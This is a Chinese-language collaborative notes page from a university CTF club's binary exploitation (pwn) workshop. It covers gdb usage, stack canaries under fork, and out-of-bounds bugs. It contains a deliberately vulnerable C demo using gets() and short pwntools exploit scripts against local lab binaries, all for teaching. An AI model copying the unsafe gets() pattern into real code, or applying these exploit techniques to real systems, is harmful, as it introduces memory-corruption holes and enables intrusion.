# NCtfU - 3/11(r8)

###### tags: `nctfu2022spring`

[toc]

## 開始時間

- PM 8:00

## Youtube links

https://youtu.be/wgxQaJOeq3I (需要請聯繫 r8)

## 會參加

- idisused
- sixkwnp
- Mark(同時在跟老闆開會,不用等我QQ)
- MiMiRinKo
- ppodds

## 講者筆記

Docker 與特定的 kernel
這裡安裝 ubuntu 20.04 與 docker 即可

安裝好的 Ghidra 或者其他順手的工具

```
安裝 pwn 工具懶人包
https://github.com/r888800009/CTF-tool/tree/master/pwn_docker

題組
git clone https://github.com/r888800009/pwn-labs
```

[簡報](https://drive.google.com/file/d/1W97fqT77fcX_C35e3upckIbh2TnWTpjR/view?usp=sharing) (需要請聯繫 r8)

大綱

- Binary 的基礎知識介紹
- gdb 操作簡介
- Mitigations 簡介與操作
- OOB 漏洞
- pwntools

[回饋表單](https://docs.google.com/forms/d/e/1FAIpQLSfIw0OI3H26h6OtiP6zd9fU8l5QXyUOPqUA0QRd2O2RGHfqLQ/viewform)

## 共筆

## stack-frame

找尋 `/bin/sh`

> search-pattern "/bin/sh"
>
> [+] Searching '/bin/sh' in memory
> [+] In '/usr/lib/x86_64-linux-gnu/libc-2.31.so'(0x7ffff7f69000-0x7ffff7fb7000), permission=r--
> 0x7ffff7f835bd - 0x7ffff7f835c4 → "/bin/sh"

跳過 `puts` 輸出

> b *main+23
> r
> set $rip=*main+31
> c

## 在 gdb 外面 attach 另外一個 /bin/sh 的 process

> gdb-peda attach $(pidof sh)

- 裡面的版本

> attach [pid of process]

## fork canary

不會 :( +1

<!-- 我決定先聽了 追不上...-->

> set follow-fork-mode child
> b *main+131
> r
> canary

fork 的 child process 和 parent process 的 canary 是相同的(因為 fork() 複製了 parent 的記憶體內容,child 不會重新產生新的 canary)

```c=
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// gcc fork_canary.c -o ./fork_canary
int main(int argc, char **argv) {
    size_t index;
    size_t *i = &index;
    int canary_offset = 0xd;

    // fork()
    pid_t pid = fork();
    if (pid == -1) {
        perror("fork");
        exit(EXIT_FAILURE);
    }

    // if child
    if (pid == 0) {
        printf("child canary?");
        scanf("%p", &index);
        if (index == i[canary_offset])
            puts("canary!");
        else
            puts("not canary!");
    } else {
        // if parent
        printf("parent canary: %p\n", i[canary_offset]);

        // wait for child
        int status;
        waitpid(pid, &status, 0);
    }

    char *buf[10];
    gets(buf);
}
```

> gcc mitigations.c -no-pie -lseccomp -o mitigations-nopie
> checksec mitigations-nopie

```
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

## oob2

> index: 5
> set: 0x5555555551a9

## pwntools oob2

```python=
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./oob2
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./oob2')

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Full RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      PIE enabled

io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

context.log_level = 'debug'
address = io.recv().decode().split(' ')[1]
io.sendline('5'.encode())
io.sendafter(b'set:', (address + '\n').encode())
io.interactive()
```

```python=
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template pwntools_packing
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('pwntools_packing')

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Full RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      PIE enabled

io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

context.log_level = 'debug'

for i in range(100):
    io.send(p32(int(io.recvline().decode())))

io.interactive()
```